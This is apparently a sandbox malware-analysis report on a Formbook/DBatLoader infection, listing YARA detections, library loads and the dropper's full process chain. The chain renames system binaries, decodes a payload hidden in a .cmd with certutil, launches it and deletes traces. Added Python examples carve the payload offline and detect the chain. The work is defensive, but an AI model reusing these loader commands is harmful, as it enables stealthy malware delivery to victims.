Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: AnyDesk.PIF PID: 8064, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: SndVol.exe PID: 7528, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: msdt.exe PID: 4040, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.bank.troj.evad.winCMD@35/15@12/1
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6E94232B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,4_2_00007FF6E94232B0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854F826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,7_2_00007FF6854F826C
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6E944FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,4_2_00007FF6E944FB54
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Code function: 10_2_02D5AD98 CreateToolhelp32Snapshot,10_2_02D5AD98
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854546C0 CoCreateInstance,#357,SysFreeString,7_2_00007FF6854546C0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854D6320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError,7_2_00007FF6854D6320
Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
Source: C:\Windows\SysWOW64\SndVol.exe | Mutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4152:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\extrac32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: A1 igazol#U00e1s.cmd | ReversingLabs: Detection: 15%
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aoikokpI.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"
Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\SndVol.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
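The two `-decodehex` steps in the chain above are certutil's CryptStringToBinary wrapper with an explicit format code. The trailing `9` is CRYPT_STRING_BASE64X509CRLHEADER (base64 between `-----BEGIN X509 CRL-----` / `-----END X509 CRL-----` lines), and `12` is CRYPT_STRING_HEXRAW (plain hex digits, no offsets or ASCII column). That explains the 3.8 MB .cmd: a batch stub that cmd.exe executes, followed by a CRL-armored base64 blob that certutil (renamed kn.exe) extracts to AnyDesk.jpeg as hex text, which a second pass turns into the PE written to AnyDesk.PIF. The Python below is an added example, not code from the sandbox report or from the sample: it replays both stages offline on a constructed stand-in for the .cmd (a fake DOS/PE header rather than the real DBatLoader payload; the exact layout of the real script's blob is not shown in the report and is assumed). It is the carving you would do on a quarantined .cmd without running certutil.

```python
import base64
import binascii
import re

# Armor lines CryptStringToBinary expects for CRYPT_STRING_BASE64X509CRLHEADER (type 9).
CRL_BEGIN = "-----BEGIN X509 CRL-----"
CRL_END = "-----END X509 CRL-----"

# certutil -decodehex <in> <out> <type>: the numeric type is a CRYPT_STRING_* flag.
CERTUTIL_TYPES = {
    9: "CRYPT_STRING_BASE64X509CRLHEADER",  # stage 1: .cmd -> AnyDesk.jpeg
    12: "CRYPT_STRING_HEXRAW",              # stage 2: AnyDesk.jpeg -> AnyDesk.PIF
}


def decode_type9(text: str) -> bytes:
    """Type 9: base64 body between the X509 CRL armor lines. Everything else in the
    file (here, the batch stub) is ignored, which is why a working .cmd can be the carrier."""
    m = re.search(re.escape(CRL_BEGIN) + r"(.*?)" + re.escape(CRL_END), text, re.S)
    if m is None:
        raise ValueError("no X509 CRL armor found")
    body = "".join(m.group(1).split())  # line breaks inside the body are ignored
    return base64.b64decode(body, validate=True)


def decode_type12(text: str) -> bytes:
    """Type 12: raw hex digits, whitespace/newlines allowed, no offsets, no ASCII column."""
    return binascii.unhexlify("".join(text.split()))


def carve_chain(cmd_text: str) -> bytes:
    """Replay both certutil invocations: .cmd --(9)--> hex text --(12)--> PE bytes."""
    stage1 = decode_type9(cmd_text)               # what certutil wrote to AnyDesk.jpeg
    return decode_type12(stage1.decode("ascii"))  # what it wrote to AnyDesk.PIF


# Constructed stand-in payload: a fake DOS stub with e_lfanew (offset 60) pointing at a
# "PE\0\0" signature at offset 64. Not the real binary; the layout is an assumption.
FAKE_PAYLOAD = b"MZ" + b"\x90" * 58 + b"\x40\x00\x00\x00" + b"PE\x00\x00" + b"\x00" * 20


def build_sample_cmd(payload: bytes, width: int = 64) -> str:
    """Batch stub that exits before the blob, then hex text wrapped in base64 and CRL armor."""
    hex_text = binascii.hexlify(payload).decode("ascii")
    hex_lines = "\r\n".join(hex_text[i:i + width] for i in range(0, len(hex_text), width))
    b64 = base64.b64encode(hex_lines.encode("ascii")).decode("ascii")
    b64_lines = "\n".join(b64[i:i + width] for i in range(0, len(b64), width))
    return (
        "@echo off\r\n"
        "rem loader commands would sit here (extrac32, kn -decodehex, start AnyDesk.PIF)\r\n"
        "exit /b\r\n"
        f"{CRL_BEGIN}\n{b64_lines}\n{CRL_END}\n"
    )


def demo() -> bytes:
    """Carve the payload back out of the constructed .cmd; returns the raw PE bytes."""
    return carve_chain(build_sample_cmd(FAKE_PAYLOAD))


if __name__ == "__main__":
    pe = demo()
    print(f"{len(pe)} bytes, magic={pe[:2]!r}, e_lfanew={int.from_bytes(pe[60:64], 'little')}")
```

On a real sample, point `carve_chain` at the .cmd read as text (latin-1 is safe for the non-blob part) and check the result for an `MZ` header; if the type code in the command line differs from 9/12, the blob is framed differently and the matching CRYPT_STRING_* decoder has to be swapped in.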
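Every executable in the chain is either a renamed system binary (cmd.exe as alpha.exe/alpha.pif, certutil.exe as kn.exe) or a LOLBin used as a file copier (extrac32, esentutl), so a hunt that keys on image names misses it. The checker below is an added example, not part of the sandbox report: it runs the command lines from the process tree above, embedded as constructed input, through rules that key on behaviour instead. The rule set and the path prefixes treated as system or user-writable are assumptions a production query would widen (the report's own quoting of the two cmd.exe /c lines is uneven, so the tokenizer is deliberately tolerant).

```python
import re
from dataclasses import dataclass

# Command lines from the process tree above, embedded as constructed input (double
# backslashes and uneven quoting reproduced as the report shows them).
PROCESS_TREE = [
    r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "',
    r'C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
    r'C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"',
    r'C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe',
    r'C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9',
    r'C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12',
    r'C:\Users\Public\Libraries\AnyDesk.PIF',
    r'C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S',
    r'C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aoikokpI.cmd" "',
    r'C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o',
    r'C:\Windows\System32\SndVol.exe',
    r'"C:\Windows\SysWOW64\msdt.exe"',
    r'/c del "C:\Windows\SysWOW64\SndVol.exe"',
]

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
USER_WRITABLE = (r"c:\users\public", "\\appdata\\", r"c:\programdata")  # assumption: widen for real telemetry
CERTUTIL_TYPES = {"9": "CRYPT_STRING_BASE64X509CRLHEADER", "12": "CRYPT_STRING_HEXRAW"}


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str
    cmdline: str


def tokenize(cmdline: str) -> list:
    """Split on whitespace keeping quoted args together; collapse \\\\ to \\ and lower-case."""
    toks = re.findall(r'"[^"]*"|\S+', cmdline)
    return [t.replace("\\\\", "\\").strip('"').lower() for t in toks]


def in_system_dir(p: str) -> bool:
    return p.startswith(SYSTEM_DIRS)


def user_writable(p: str) -> bool:
    return any(marker in p for marker in USER_WRITABLE)


def find_verb(toks: list, names: set) -> int:
    """Index of the first token whose basename is in names, or -1; catches `alpha /c extrac32 ...`."""
    for i, t in enumerate(toks):
        if t.rsplit("\\", 1)[-1] in names:
            return i
    return -1


def check(cmdline: str) -> list:
    toks = tokenize(cmdline)
    hits = []
    if not toks:
        return hits
    # 1. extrac32 /C /Y <src> <dst>: the cabinet extractor used to copy a System32 binary out
    i = find_verb(toks, {"extrac32", "extrac32.exe"})
    if i >= 0:
        paths = [t for t in toks[i + 1:] if not t.startswith("/")]
        if len(paths) >= 2 and in_system_dir(paths[0]) and user_writable(paths[1]):
            hits.append(Finding("lolbin_copy_extrac32", f"{paths[0]} -> {paths[1]}", cmdline))
    # 2. esentutl /y <src> /d <dst>: same trick through the ESE utility
    i = find_verb(toks, {"esentutl", "esentutl.exe"})
    if i >= 0 and "/y" in toks[i:] and "/d" in toks[i:]:
        src, dst = toks[toks.index("/y", i) + 1], toks[toks.index("/d", i) + 1]
        if in_system_dir(src) and user_writable(dst):
            hits.append(Finding("lolbin_copy_esentutl", f"{src} -> {dst}", cmdline))
    # 3. the -decodehex switch is certutil behaviour whatever the image is called (kn.exe here)
    if "-decodehex" in toks:
        code = toks[-1] if toks[-1].isdigit() else "default"
        hits.append(Finding("certutil_decodehex", CERTUTIL_TYPES.get(code, f"type {code}"), cmdline))
    # 4. image launched from a user-writable folder (covers the .pif/.exe renames of cmd.exe)
    if user_writable(toks[0]):
        hits.append(Finding("exec_from_user_writable", toks[0], cmdline))
    # 5. batch script argument that lives in a user-writable folder
    for t in toks[1:]:
        if t.endswith((".cmd", ".bat")) and user_writable(t):
            hits.append(Finding("script_from_user_writable", t, cmdline))
            break
    # 6. del of a dropped tool (anti-forensics) or of a file under a system directory
    if "del" in toks:
        rest = [t for t in toks[toks.index("del") + 1:] if not t.startswith("/")]
        if rest and in_system_dir(rest[0]):
            hits.append(Finding("del_system_file", rest[0], cmdline))
        elif rest and user_writable(rest[0]):
            hits.append(Finding("cleanup_dropped_tool", rest[0], cmdline))
    return hits


def scan(lines: list) -> list:
    return [f for line in lines for f in check(line)]


def rule_counts(lines: list) -> dict:
    counts = {}
    for f in scan(lines):
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan(PROCESS_TREE):
        print(f"{f.rule:26} {f.detail}")
```

Run against the report's lines it produces 13 findings; the conhost, SndVol and msdt launches are clean on their own, which is the point: the parent/child relationship (explorer.exe spawning msdt.exe, msdt.exe deleting SndVol.exe) is what ties those to the injection, and that needs the process tree, not the command line.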
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: textshaping.dll
Source: C:\Users\Public\kn.exe | Section loaded: certcli.dll
Source: C:\Users\Public\kn.exe | Section loaded: cabinet.dll
Source: C:\Users\Public\kn.exe | Section loaded: cryptui.dll
Source: C:\Users\Public\kn.exe | Section loaded: ncrypt.dll
Source: C:\Users\Public\kn.exe | Section loaded: netapi32.dll
Source: C:\Users\Public\kn.exe | Section loaded: ntdsapi.dll
Source: C:\Users\Public\kn.exe | Section loaded: version.dll
Source: C:\Users\Public\kn.exe | Section loaded: secur32.dll
Source: C:\Users\Public\kn.exe | Section loaded: certca.dll
Source: C:\Users\Public\kn.exe | Section loaded: cryptsp.dll
Source: C:\Users\Public\kn.exe | Section loaded: samcli.dll
Source: C:\Users\Public\kn.exe | Section loaded: logoncli.dll
Source: C:\Users\Public\kn.exe | Section loaded: dsrole.dll
Source: C:\Users\Public\kn.exe | Section loaded: netutils.dll
Source: C:\Users\Public\kn.exe | Section loaded: sspicli.dll
Source: C:\Users\Public\kn.exe | Section loaded: ntasn1.dll
Source: C:\Users\Public\kn.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\kn.exe | Section loaded: profapi.dll
Source: C:\Users\Public\kn.exe | Section loaded: certcli.dll
Source: C:\Users\Public\kn.exe | Section loaded: cabinet.dll
Source: C:\Users\Public\kn.exe | Section loaded: cryptui.dll
Source: C:\Users\Public\kn.exe | Section loaded: ncrypt.dll
Source: C:\Users\Public\kn.exe | Section loaded: netapi32.dll
Source: C:\Users\Public\kn.exe | Section loaded: ntdsapi.dll
Source: C:\Users\Public\kn.exe | Section loaded: version.dll
Source: C:\Users\Public\kn.exe | Section loaded: secur32.dll
Source: C:\Users\Public\kn.exe | Section loaded: certca.dll
Source: C:\Users\Public\kn.exe | Section loaded: cryptsp.dll
Source: C:\Users\Public\kn.exe | Section loaded: samcli.dll
Source: C:\Users\Public\kn.exe | Section loaded: logoncli.dll
Source: C:\Users\Public\kn.exe | Section loaded: dsrole.dll
Source: C:\Users\Public\kn.exe | Section loaded: netutils.dll
Source: C:\Users\Public\kn.exe | Section loaded: sspicli.dll
Source: C:\Users\Public\kn.exe | Section loaded: ntasn1.dll
Source: C:\Users\Public\kn.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: version.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: olepro32.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: url.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: learning_tools.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: mssip32.dll
